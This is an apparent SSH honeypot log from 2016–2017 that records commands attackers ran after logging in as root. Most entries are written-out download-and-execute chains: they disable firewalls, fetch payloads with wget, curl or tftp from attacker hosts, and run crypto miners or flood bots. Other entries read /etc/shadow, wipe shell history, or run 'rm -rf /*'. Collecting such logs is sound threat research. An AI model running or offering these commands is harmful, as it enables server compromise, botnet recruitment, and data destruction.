From 146.185.239.17 14-Aug-2017 17:43:33 ssh2 root
w
uname
/sbin/ifconfig
gcc
uname -a
cat /proc/cpuinfo
exit

From 1.83.30.115 17-Aug-2017 23:52:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://116.31.119.26:8080/httpsd;chmod 777 httpsd;./httpsd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http://116.31.119.26:8080/httpsd
chmod 777 httpsd
./httpsd

From 116.31.119.26 18-Aug-2017 04:45:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http:/116.31.119.26:8080/httpsd;chmod 777 httpsd;./httpsd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http:/116.31.119.26:8080/httpsd
chmod 777 httpsd
./httpsd

From 116.31.119.26 18-Aug-2017 09:38:45 ssh2 root
Exec /etc/init.d/iptables stop;
/etc/init.d/iptables stop

From 116.31.119.26 18-Aug-2017 14:31:49 ssh2 root
Exec service iptables stop
service iptables stop

From 116.31.119.26 18-Aug-2017 19:24:53 ssh2 root
Exec SuSEfirewall2 stop
SuSEfirewall2 stop

From 116.31.119.26 19-Aug-2017 00:17:57 ssh2 root
Exec reSuSEfirewall2 stop
reSuSEfirewall2 stop

From 116.31.119.26 19-Aug-2017 05:11:01 ssh2 root
Exec cd /etc
cd /etc

From 116.31.119.26 19-Aug-2017 10:04:05 ssh2 root
Exec yum install -y wget
yum install -y wget

From 116.31.119.26 19-Aug-2017 19:50:13 ssh2 root
Exec wget -c http://116.31.119.26:8080/httpsd
wget -c http://116.31.119.26:8080/httpsd

From 116.31.119.26 20-Aug-2017 00:43:17 ssh2 root
Exec chmod 777 httpsd
chmod 777 httpsd

From 116.31.119.26 20-Aug-2017 15:22:29 ssh2 root
Exec ./httpsd
./httpsd

From 116.31.119.26 21-Aug-2017 01:08:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://116.31.119.26:80/httpsd;chmod 777 httpsd;./httpsd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http://116.31.119.26:80/httpsd
chmod 777 httpsd
./httpsd

From 116.31.119.26 21-Aug-2017 10:54:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://116.31.119.26:80/httpsd;chmod 755 httpsd;./httpsd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
yum install -y wget
wget -c http://116.31.119.26:80/httpsd
chmod 755 httpsd
./httpsd

From 104.171.170.221  7-Sep-2017 08:19:17 ssh2 root
ls
cd /tmp

From 117.3.205.108  7-Sep-2017 13:12:21 ssh2 root
jos

From 113.181.117.14  7-Sep-2017 18:05:25 ssh2 root
histoprry

From 193.201.224.206  7-Sep-2017 22:58:29 ssh2 root
histroy
cwget
wget
ps aux
uname -a
cat /etc/issue
rm
rm -rf /*

From 185.58.193.149 25-Oct-2017 04:09:57 ssh2 root
Exec wget http://31.14.133.104/botz.sh; chmod +x *; bash botz.sh;wget http://31.14.133.104/root-1234
wget http://31.14.133.104/botz.sh
chmod +x *
bash botz.sh
wget http://31.14.133.104/root-1234

From 124.237.7.23  4-Nov-2017 20:01:09 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.196/lmao.sh; curl -O http://185.165.29.196/lmao.sh; chmod 777 lmao.sh; sh lmao.sh; tftp 185.165.29.196 -c get lol.sh; chmod 777 lol.sh; sh lol.sh; tftp -r lol1.sh -g 185.165.29.196; chmod 777 lol1.sh; sh lol1.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.196 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://185.165.29.196/lmao.sh
curl -O http://185.165.29.196/lmao.sh
chmod 777 lmao.sh
sh lmao.sh
tftp 185.165.29.196 -c get lol.sh
chmod 777 lol.sh
sh lol.sh
tftp -r lol1.sh -g 185.165.29.196
chmod 777 lol1.sh
sh lol1.sh
ftpget -v -u anonymous -p anonymous -P 21
sh ftp1.sh
rm -rf *

From 46.243.189.111  5-Nov-2017 06:22:07 ssh2 root
Exec cd /var/tmp; wget http://185.165.29.196/lmao.sh; curl -O http://185.165.29.196/lmao.sh; chmod 777 lmao.sh; sh lmao.sh; busybox tftp 185.165.29.196 -c get lol.sh; chmod 777 lol.sh; sh lol.sh;busybox tftp -r lol1.sh -g 185.165.29.196; chmod 777 lol1.sh; sh lol1.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.196 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf *
cd /var/tmp
wget http://185.165.29.196/lmao.sh
curl -O http://185.165.29.196/lmao.sh
chmod 777 lmao.sh
sh lmao.sh
busybox tftp 185.165.29.196 -c get lol.sh
chmod 777 lol.sh
sh lol.sh
busybox tftp -r lol1.sh -g 185.165.29.196
chmod 777 lol1.sh
sh lol1.sh
ftpget -v -u anonymous -p anonymous -P 21
sh ftp1.sh
rm -rf *

From 51.15.193.245  9-Nov-2017 03:30:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.22/8UsA.sh; curl -O http://82.202.235.22/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.22 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.22; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.22 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://82.202.235.22/8UsA.sh
curl -O http://82.202.235.22/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 82.202.235.22 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 82.202.235.22
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 94.177.161.150 15-Nov-2017 04:24:21 ssh2 root
Exec uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 
uname -a && echo RAM: && free -mt

From 207.148.99.179 29-Nov-2017 20:17:13 ssh2 root
Exec rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -q -O /tmp/run $u || curl -fsSL -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run;echo > ~/.bash_history
rm -f /tmp/run
if [ `getconf LONG_BIT` -eq 64 ]
then u="http://www.bizqsoft.com/tp2/r6.log"
else u="http://www.bizqsoft.com/tp2/r.log"
fi
(wget -q -O /tmp/run $u || curl -fsSL
urllib.urlretrieve('$u','/tmp/run')")
chmod 0777 /tmp/run && /tmp/run
rm -rf /tmp/run
echo > ~/.bash_history

From 119.188.247.73 15-Dec-2017 00:16:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:5858/TTTUS2;chmod 777 TTTUS2;./TTTUS2;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.188.247.73:5858/TTTUS2
chmod 777 TTTUS2
./TTTUS2

From 46.243.189.111 20-Dec-2017 23:24:35 ssh2 root
Exec cd /tmp; wget http://46.243.189.109/w || curl -O http://46.243.189.109/w; chmod 777 w; sh w; rm -rf w; tftp 46.243.189.109 -c get alexis.sh; chmod 777 alexis.sh; sh alexis.sh; tftp -r Word.sh -g 46.243.189.109; chmod 777 Word.sh; sh Word.sh;rm -rf alexis.sh Word.sh
cd /tmp
wget http://46.243.189.109/w || curl -O http://46.243.189.109/w
chmod 777 w
sh w
rm -rf w
tftp 46.243.189.109 -c get alexis.sh
chmod 777 alexis.sh
sh alexis.sh
tftp -r Word.sh -g 46.243.189.109
chmod 777 Word.sh
sh Word.sh
rm -rf alexis.sh Word.sh

File: fakesshd-log-2016.txt


From 37.201.242.176  7-Jan-2016 18:49:57 ssh2 root
w
unset HISTFILE
unset HISTSAVE
w
uname -a
cat /etc/hosts

From 5.188.10.144  7-Jan-2016 23:43:01 ssh2 root
cat /proc/cpuinfo
exit

From 213.225.6.22  9-Jan-2016 00:08:21 ssh2 root
w
uname -a
w
ls -a
cat ash_history
uname -a
cat /proc/cpuinfo
/sbin/ifconfig | grep inet -wc -l
/sbin/ifconfig | grep inet -wc
/sbin/ifconfig | grep inet
cat /etc/hosts
cd 7var/tmp
cd /var/tmp
ls -a
cd /var
ls -a
cd /tmp
pwd
wget http://t1fix.com/u.tar
tar xvf u.tar
wget http://t1fix.com/u.tar
mkdir .cache
apt-get update
yum update
apt update
sudo update
apt-get
apt-get install sudo
ls -a
cd .ssh
ls -a
last
cat /etc/shadow
cat /etc/passwd
wget http://t1fix.com/u.tar
curl -O http://t1fix.com/u.tar
wget //t1fix.com/u.tar
cd ..
cd .. cd
cd
ls -a
cat .bash_history
cat .xauthdljiQQ

From 213.225.6.22  9-Jan-2016 05:01:25 ssh2 root
cd /var/tmp
wget futem.pe.hu/5352353252362.txt
chmod +x *
perl 5352353252362.txt

From 121.12.173.62  9-Jan-2016 10:49:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-25;chmod 777 duge-25;./duge-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/duge-25
chmod 777 duge-25
./duge-25

From 178.208.182.119 13-Jan-2016 01:49:41 ssh2 root
cd /var/tmp
wget http://futem.pe.hu/5352353252362.txt
chmod +x *
perl 5352353252362.txt
wget http://futem.pe.hu/5352353252362.txt

From 121.12.173.62 21-Jan-2016 12:36:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188:454/wwwww;chmod 755 wwwww;./wwwww;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188:454/wwwww
chmod 755 wwwww
./wwwww

From 60.10.115.187 28-Jan-2016 08:09:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f  xmrminer
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f xmrminer

From 121.12.173.62 30-Jan-2016 03:35:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-25;chmod 755 duge-25;./duge-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/duge-25
chmod 755 duge-25
./duge-25

From 60.10.115.187 30-Jan-2016 13:53:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;chmod 777 xmrminer;./xmrminer;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chmod 777 xmrminer
./xmrminer

From 110.19.181.193  3-Feb-2016 05:48:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://116.196.86.246/xmrminer;chmod 777 xmrminer;./xmrminer;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://116.196.86.246/xmrminer
chmod 777 xmrminer
./xmrminer

From 113.237.196.174 10-Feb-2016 03:52:53 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c1;chmod 777 c1;./c1;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c2;chmod 777 c2;./c2;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c3;chmod 777 c1;./c3;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/c4;chmod 777 c1;./c4;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://113.237.196.174:6160/za4;chmod 777 c1;./za4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://113.237.196.174:6160/c1
chmod 777 c1
./c1
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://113.237.196.174:6160/c2
chmod 777 c2
./c2
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://113.237.196.174:6160/c3
chmod 777 c1
./c3
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://113.237.196.174:6160/c4
chmod 777 c1
./c4
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://113.237.196.174:6160/za4
chmod 777 c1
./za4

From 37.228.235.137 11-Feb-2016 23:50:29 ssh2 root
unset HISTFILE unset HISTSAVE unset SAVEFILE history -n
w
ps x
sshd
cat /usr/include/netda.h
ps x

From 121.12.173.62 12-Feb-2016 02:04:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:88/dudusyn;chmod 777 dudusyn;./dudusyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.34.203:88/dudusyn
chmod 777 dudusyn
./dudusyn

From 178.132.3.14 12-Feb-2016 04:43:33 ssh2 root
ls -la
nano ipcalc.pl
vi ipcalc.pl
cat ipcalc.pl
cat /etc/hosts
cat /etc/passwd
vi .bastory
yum
apt-get
apt-get install nano

From 121.12.173.62 12-Feb-2016 22:46:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/121udp;chmod 777 121udp;./121udp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/121udp
chmod 777 121udp
./121udp

From 116.196.121.240 15-Feb-2016 01:06:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://yyaog.cn:9191/cc1;chmod 777 cc1;./cc1;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c  http://yyaog.cn:9191/cc2;chmod 777 cc2;./cc2;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c  http://yyaog.cn:9191/cc3;chmod 777 cc3;./cc3;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c  http://yyaog.cn:9191/cc4;chmod 777 cc4;./cc4;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://yyaog.cn:9191/cc1
chmod 777 cc1
./cc1
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://yyaog.cn:9191/cc2
chmod 777 cc2
./cc2
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://yyaog.cn:9191/cc3
chmod 777 cc3
./cc3
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://yyaog.cn:9191/cc4
chmod 777 cc4
./cc4
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop

From 123.190.181.165 15-Feb-2016 20:38:45 ssh2 root
Exec /etc/init.d/iptables stop
/etc/init.d/iptables stop

From 110.19.181.194 21-Feb-2016 13:24:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.86.246/xmrminer;chmod 777 xmrminer;./xmrminer;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
wget -c http://116.196.86.246/xmrminer
chmod 777 xmrminer
./xmrminer

From 121.12.173.62 24-Feb-2016 03:52:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/121syn;chmod 755 121syn;./121syn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/121syn
chmod 755 121syn
./121syn

From 92.82.118.85 26-Feb-2016 15:31:17 ssh2 root
ls
w
free -mt
cat /proc/cpuinfo
passwd
sudo su
cat /etc/issue
perl test.pl
ls
./test.pl
yum
apt

From 122.142.49.205 27-Feb-2016 11:03:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.86.246:7800/xmrminer;chmod 777 xmrminer;./xmrminer;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
wget -c http://116.196.86.246:7800/xmrminer
chmod 777 xmrminer
./xmrminer

From 117.131.151.154  2-Mar-2016 02:58:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.86.246:7800/xmrminer;chmod 777 xmrminer;setsid ./xmrminer &>>ldevlnull;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
wget -c http://116.196.86.246:7800/xmrminer
chmod 777 xmrminer
setsid ./xmrminer &>>ldevlnull

From 121.12.173.62  2-Mar-2016 11:48:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/121syn;chmod 777 121syn;./121syn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/121syn
chmod 777 121syn
./121syn

From 121.12.173.62  3-Mar-2016 18:51:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188syn;chmod 777 188syn;./188syn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/188syn
chmod 777 188syn
./188syn

From 117.131.151.154  3-Mar-2016 22:56:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;killall xmrminer ;killall xmring  ;rm -rf  xmrminer* ;wget -c http://116.196.86.246:7800/xmrminer;chmod 777 xmrminer;setsid ./xmrminer &>>ldevlnull;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
killall xmrminer
killall xmring
rm -rf xmrminer*
wget -c http://116.196.86.246:7800/xmrminer
chmod 777 xmrminer
setsid ./xmrminer &>>ldevlnull

From 213.147.164.60 10-Mar-2016 11:14:29 ssh2 root
w
nproc

From 121.12.173.62 12-Mar-2016 20:11:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188syn;chmod 755 188syn;./188syn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/188syn
chmod 755 188syn
./188syn

From 185.123.101.87 15-Mar-2016 23:07:17 ssh2 root
uptime
cat /proc/cpuinfo
ls -a
w
unzip
exit

From 121.12.173.62 19-Mar-2016 17:47:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188;chmod 755 188;./188;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/188
chmod 755 188
./188

From 121.12.173.62 20-Mar-2016 04:08:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/188771;chmod 777 188771;./188771;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/188771
chmod 777 188771
./188771

From 121.12.173.62 21-Mar-2016 00:50:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/141x;chmod 755 141x;./141x;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/141x
chmod 755 141x
./141x

From 121.12.173.62 21-Mar-2016 11:11:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/141d;chmod 777 141d;./141d;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/141d
chmod 777 141d
./141d

From 121.12.173.62 22-Mar-2016 18:13:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:88/bbs;chmod 755 bbs;./bbs;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.121:88/bbs
chmod 755 bbs
./bbs

From 128.199.174.70 23-Mar-2016 04:34:53 ssh2 root
Exec uname -ms
uname -ms

From 121.12.173.62 23-Mar-2016 14:55:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:88/qwer;chmod 777 qwer;./qwer;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.121:88/qwer
chmod 777 qwer
./qwer

From 121.12.173.62 24-Mar-2016 01:16:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-udp;chmod 755 duge-udp;./duge-udp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/duge-udp
chmod 755 duge-udp
./duge-udp

From 121.12.173.62 24-Mar-2016 21:58:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144syn;chmod 755 144syn;./144syn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/144syn
chmod 755 144syn
./144syn

From 110.19.181.198 25-Mar-2016 17:34:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/;rm -rf xm.sh;wget -c http://116.196.86.246:7800/xm.sh;chmod 777 xm.sh;sh xm.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
rm -rf xm.sh
wget -c http://116.196.86.246:7800/xm.sh
chmod 777 xm.sh
sh xm.sh

From 121.12.173.62 26-Mar-2016 15:22:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:81/x6z;chmod 777 x6z;./x6z;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.121:81/x6z
chmod 777 x6z
./x6z

From 121.12.173.62 27-Mar-2016 02:43:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-udp;chmod 0755 duge-udp;./duge-udp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/duge-udp
chmod 0755 duge-udp
./duge-udp

From 121.12.173.62 27-Mar-2016 23:25:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/771xm;chmod 755 771xm;./771xm;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/771xm
chmod 755 771xm
./771xm

From 121.12.173.62 28-Mar-2016 09:46:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/Linux-syn1991;chmod 777 Linux-syn1991;./Linux-syn1991;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/Linux-syn1991
chmod 777 Linux-syn1991
./Linux-syn1991

From 121.12.173.62 29-Mar-2016 06:28:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144udp;chmod 755 144udp;./144udp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/144udp
chmod 755 144udp
./144udp

From 121.12.173.62 30-Mar-2016 03:10:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/google;chmod 777 google;./google;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/google
chmod 777 google
./google

From 121.12.173.62 30-Mar-2016 13:31:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144udp;chmod 755 10123/144udp;./10123/144udp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/144udp
chmod 755 10123/144udp
./10123/144udp

From 121.12.173.62 30-Mar-2016 23:52:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/231.exe;chmod 777 231.exe;./231.exe;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/231.exe
chmod 777 231.exe
./231.exe

From 121.12.173.62  1-Apr-2016 06:55:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/144syn;chmod 777 144syn;./144syn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/144syn
chmod 777 144syn
./144syn

From 121.12.173.62  1-Apr-2016 17:16:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.115.117:88/ssd;chmod 755 ssd;./ssd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.147.115.117:88/ssd
chmod 755 ssd
./ssd

From 121.12.173.62  4-Apr-2016 17:42:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:81/121771;chmod 777 121771;./121771;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.121:81/121771
chmod 777 121771
./121771

From 121.12.173.62  5-Apr-2016 04:03:53 ssh2 root
